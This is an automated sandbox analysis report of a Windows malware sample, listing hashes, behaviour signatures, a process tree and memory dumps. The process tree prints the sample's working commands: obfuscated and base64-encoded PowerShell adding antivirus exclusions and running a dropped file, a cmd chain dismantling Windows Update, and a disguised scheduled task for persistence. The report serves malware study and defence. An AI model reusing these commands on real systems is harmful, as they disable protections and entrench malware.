Analysis
-
max time kernel
151s -
max time network
85s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
01-09-2022 15:37
General
-
Target
EdEYMrpFBNbTRHo.exe
-
Size
4.5MB
-
MD5
b7c12ce33a5c2de80bcd7083d839df6e
-
SHA1
6d2bce616fc00cafeb2ae4c5499305b36fcfb4f1
-
SHA256
65970760831f083ce65c5ec185f5c1d1c73217bcf600de567f2960b592412c52
-
SHA512
b3cbb1c781217aee343352f5ef2668fec9aa70a3f8ed39eafef88815bc4b5a858965d4ea9d30f86e04cdff4d22bef4447333027a56fbc02fc9708203e9987225
-
SSDEEP
98304:Ha3DFNglg7shj9/X92ZmvG+Hc7supSg8MXGBl3Qbf2jYpvRhzPQA:q23V9/X9pvL+sWKMXGwDEYVx
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Stops running service(s) 3 TTPs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 4 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Drops file in Windows directory 6 IoCs
-
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry key 1 TTPs 9 IoCs
-
Modifies system certificate store 2 TTPs 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in Windows directory
- Suspicious use of UnmapMainImage
-
C:\Windows\system32\taskeng.exetaskeng.exe {7786B19D-3129-409E-98F5-AF13F46F2CCE} S-1-5-18:NT AUTHORITY\System:Service:3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe"C:\Users\Admin\AppData\Local\Temp\EdEYMrpFBNbTRHo.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAYgByAGwAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBtAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAbwB4AGIAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBpAHcAdwAjAD4A"3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG8AcAAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AHQAZQBtAHAAIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwB0AGUAbQBwAC4AZQB4AGUAJwApACAAPAAjAHcAaAByAGoAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\temp.exe"C:\Users\Admin\AppData\Local\Temp\temp.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "temp.exe"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 56⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Program Files\Google\Chrome\updater.exe\""4⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"4⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{ca62b83c-a817-46d2-a781-0f5619a79749}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{5553d091-7dcd-460c-84b3-9c3dffb273d6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-721758836-1178003207-215216619820018367-10098367862699943336500725501676099483"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\temp.exeFilesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
C:\Users\Admin\AppData\Local\Temp\temp.exeFilesize
7KB
MD5f321da5881a6aaeb53da13d5c075406b
SHA1979ed66205d2bad63fc016dc8c32cff6a2b6fc05
SHA256a6bdf9fcd293ff8169731da2a0a9501ad3a4fd14ce1559bc3f3d26dae9e6f57c
SHA512c7cf54223afcf437d7206e97ce1003ebf5ddc2b8aa986003f53068a4fd873346298bc998abf303bd54a94e83689ac34786e98deb34446862c1c344121d46851b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5bfca112062734fd248b93575cf55b3d2
SHA11edbccf31b805027460faff098d6b41a8d6fed40
SHA256975559b9931439f0a21376feac1e5e7a2a61efa86bf91ca92cdb490ca36cd393
SHA51266bc6392fb071a84ab5890dd21300567e6e5cf52e3a7faa2f071414cfdcfb699898d6f6bfb962e49125dc6b1ca80472a1df56cde0b15a21797a0542e0689096d
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD5986728d0ddcfaf9a4682ef03ec4f8a4a
SHA165f594a0d33d3aef06ce0e555cbab9279968bfc5
SHA2566c5caef65347fd26adad6439211b4ec8180939dddc532e3c9a58d37c2628ffc7
SHA512bf6fe867bb79bd85ec384df6891dc179e8984e9a166d961a520e074df234c9e4ba75d37eb32ca3e3c7deaf59efe399416a53562c34ffba9a446c3984d1f78708
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/108-78-0x0000000000000000-mapping.dmp
-
memory/112-82-0x0000000000000000-mapping.dmp
-
memory/324-233-0x0000000000920000-0x000000000094A000-memory.dmpFilesize
168KB
-
memory/416-157-0x0000000000880000-0x00000000008A3000-memory.dmpFilesize
140KB
-
memory/416-152-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/416-155-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/416-158-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
memory/416-149-0x0000000000880000-0x00000000008A3000-memory.dmpFilesize
140KB
-
memory/440-77-0x0000000000000000-mapping.dmp
-
memory/460-160-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/460-164-0x0000000000170000-0x000000000019A000-memory.dmpFilesize
168KB
-
memory/460-162-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/468-66-0x0000000000000000-mapping.dmp
-
memory/476-168-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/476-165-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/476-230-0x0000000000230000-0x000000000025A000-memory.dmpFilesize
168KB
-
memory/484-234-0x00000000003C0000-0x00000000003EA000-memory.dmpFilesize
168KB
-
memory/484-172-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/484-170-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/568-71-0x0000000000000000-mapping.dmp
-
memory/568-121-0x0000000000830000-0x0000000000838000-memory.dmpFilesize
32KB
-
memory/568-119-0x0000000000000000-mapping.dmp
-
memory/568-283-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/568-282-0x0000000000500000-0x000000000052A000-memory.dmpFilesize
168KB
-
memory/576-65-0x0000000000000000-mapping.dmp
-
memory/588-178-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/588-237-0x00000000001F0000-0x000000000021A000-memory.dmpFilesize
168KB
-
memory/588-176-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/616-67-0x0000000000000000-mapping.dmp
-
memory/668-183-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/668-179-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/668-240-0x00000000003F0000-0x000000000041A000-memory.dmpFilesize
168KB
-
memory/732-242-0x0000000000940000-0x000000000096A000-memory.dmpFilesize
168KB
-
memory/732-185-0x000007FEBEB00000-0x000007FEBEB10000-memory.dmpFilesize
64KB
-
memory/732-186-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/748-263-0x0000000001BE0000-0x0000000001C0A000-memory.dmpFilesize
168KB
-
memory/748-264-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/804-72-0x0000000000000000-mapping.dmp
-
memory/808-244-0x0000000000820000-0x000000000084A000-memory.dmpFilesize
168KB
-
memory/808-247-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/848-255-0x0000000000910000-0x000000000093A000-memory.dmpFilesize
168KB
-
memory/888-257-0x00000000009C0000-0x00000000009EA000-memory.dmpFilesize
168KB
-
memory/888-259-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/908-64-0x0000000000000000-mapping.dmp
-
memory/912-141-0x00000001400033F4-mapping.dmp
-
memory/912-163-0x0000000076E00000-0x0000000076FA9000-memory.dmpFilesize
1.7MB
-
memory/912-154-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/912-140-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/912-143-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/912-276-0x0000000000230000-0x000000000025A000-memory.dmpFilesize
168KB
-
memory/912-145-0x0000000076E00000-0x0000000076FA9000-memory.dmpFilesize
1.7MB
-
memory/912-147-0x0000000076BE0000-0x0000000076CFF000-memory.dmpFilesize
1.1MB
-
memory/952-224-0x0000000076FE0000-0x0000000077160000-memory.dmpFilesize
1.5MB
-
memory/952-133-0x0000000075071000-0x0000000075073000-memory.dmpFilesize
8KB
-
memory/952-137-0x0000000073990000-0x0000000073F3B000-memory.dmpFilesize
5.7MB
-
memory/952-130-0x0000000000000000-mapping.dmp
-
memory/952-198-0x0000000073990000-0x0000000073F3B000-memory.dmpFilesize
5.7MB
-
memory/964-273-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/964-272-0x0000000000840000-0x000000000086A000-memory.dmpFilesize
168KB
-
memory/1020-307-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1020-306-0x0000000000240000-0x000000000026A000-memory.dmpFilesize
168KB
-
memory/1020-290-0x0000000000000000-mapping.dmp
-
memory/1044-56-0x000007FEFB821000-0x000007FEFB823000-memory.dmpFilesize
8KB
-
memory/1044-99-0x0000000000970000-0x0000000000976000-memory.dmpFilesize
24KB
-
memory/1044-55-0x000000001BDD0000-0x000000001C234000-memory.dmpFilesize
4.4MB
-
memory/1044-54-0x000000013F880000-0x000000013FD06000-memory.dmpFilesize
4.5MB
-
memory/1056-126-0x0000000000000000-mapping.dmp
-
memory/1076-261-0x00000000001B0000-0x00000000001DA000-memory.dmpFilesize
168KB
-
memory/1116-265-0x0000000000270000-0x000000000029A000-memory.dmpFilesize
168KB
-
memory/1128-93-0x0000000000000000-mapping.dmp
-
memory/1128-123-0x0000000002844000-0x0000000002847000-memory.dmpFilesize
12KB
-
memory/1128-122-0x000000000284B000-0x000000000286A000-memory.dmpFilesize
124KB
-
memory/1128-115-0x0000000002844000-0x0000000002847000-memory.dmpFilesize
12KB
-
memory/1128-98-0x000000001B790000-0x000000001BA8F000-memory.dmpFilesize
3.0MB
-
memory/1128-97-0x000007FEEB170000-0x000007FEEBCCD000-memory.dmpFilesize
11.4MB
-
memory/1128-96-0x000007FEEBCD0000-0x000007FEEC6F3000-memory.dmpFilesize
10.1MB
-
memory/1180-266-0x0000000001B20000-0x0000000001B4A000-memory.dmpFilesize
168KB
-
memory/1180-269-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1268-270-0x0000000002C80000-0x0000000002CAA000-memory.dmpFilesize
168KB
-
memory/1268-271-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1304-88-0x0000000000000000-mapping.dmp
-
memory/1304-284-0x00000000001B0000-0x00000000001DA000-memory.dmpFilesize
168KB
-
memory/1320-92-0x0000000000000000-mapping.dmp
-
memory/1336-69-0x0000000000000000-mapping.dmp
-
memory/1368-89-0x0000000000000000-mapping.dmp
-
memory/1408-100-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-107-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-128-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-103-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-114-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-112-0x0000000140001844-mapping.dmp
-
memory/1408-111-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-105-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-106-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-101-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-110-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-108-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1408-117-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/1444-61-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/1444-62-0x0000000002534000-0x0000000002537000-memory.dmpFilesize
12KB
-
memory/1444-59-0x000007FEEC560000-0x000007FEECF83000-memory.dmpFilesize
10.1MB
-
memory/1444-60-0x000007FEEBA00000-0x000007FEEC55D000-memory.dmpFilesize
11.4MB
-
memory/1444-57-0x0000000000000000-mapping.dmp
-
memory/1444-63-0x000000000253B000-0x000000000255A000-memory.dmpFilesize
124KB
-
memory/1496-85-0x0000000000000000-mapping.dmp
-
memory/1500-86-0x0000000000000000-mapping.dmp
-
memory/1500-127-0x0000000000000000-mapping.dmp
-
memory/1504-70-0x0000000000000000-mapping.dmp
-
memory/1524-81-0x0000000000000000-mapping.dmp
-
memory/1540-84-0x0000000000000000-mapping.dmp
-
memory/1564-91-0x0000000000000000-mapping.dmp
-
memory/1564-304-0x0000000001BB0000-0x0000000001BDA000-memory.dmpFilesize
168KB
-
memory/1564-305-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1580-250-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/1580-267-0x0000000000170000-0x000000000018B000-memory.dmpFilesize
108KB
-
memory/1580-253-0x0000000076FE0000-0x0000000077160000-memory.dmpFilesize
1.5MB
-
memory/1580-180-0x0000000000400000-0x0000000000435000-memory.dmpFilesize
212KB
-
memory/1580-182-0x00000000004039E0-mapping.dmp
-
memory/1580-268-0x00000000001D0000-0x00000000001F1000-memory.dmpFilesize
132KB
-
memory/1588-146-0x0000000000FEB000-0x000000000100A000-memory.dmpFilesize
124KB
-
memory/1588-136-0x0000000000FE4000-0x0000000000FE7000-memory.dmpFilesize
12KB
-
memory/1588-150-0x0000000076BE0000-0x0000000076CFF000-memory.dmpFilesize
1.1MB
-
memory/1588-148-0x0000000076E00000-0x0000000076FA9000-memory.dmpFilesize
1.7MB
-
memory/1588-138-0x0000000076E00000-0x0000000076FA9000-memory.dmpFilesize
1.7MB
-
memory/1588-90-0x0000000000000000-mapping.dmp
-
memory/1588-139-0x0000000076BE0000-0x0000000076CFF000-memory.dmpFilesize
1.1MB
-
memory/1588-129-0x0000000000000000-mapping.dmp
-
memory/1588-134-0x000007FEEC670000-0x000007FEED093000-memory.dmpFilesize
10.1MB
-
memory/1588-144-0x0000000000FE4000-0x0000000000FE7000-memory.dmpFilesize
12KB
-
memory/1588-135-0x000007FEEBB10000-0x000007FEEC66D000-memory.dmpFilesize
11.4MB
-
memory/1596-281-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1596-275-0x0000000000380000-0x00000000003AA000-memory.dmpFilesize
168KB
-
memory/1628-87-0x0000000000000000-mapping.dmp
-
memory/1664-73-0x0000000000000000-mapping.dmp
-
memory/1720-274-0x00000000007D0000-0x00000000007FA000-memory.dmpFilesize
168KB
-
memory/1720-280-0x0000000036E40000-0x0000000036E50000-memory.dmpFilesize
64KB
-
memory/1772-124-0x0000000000000000-mapping.dmp
-
memory/1844-79-0x0000000000000000-mapping.dmp
-
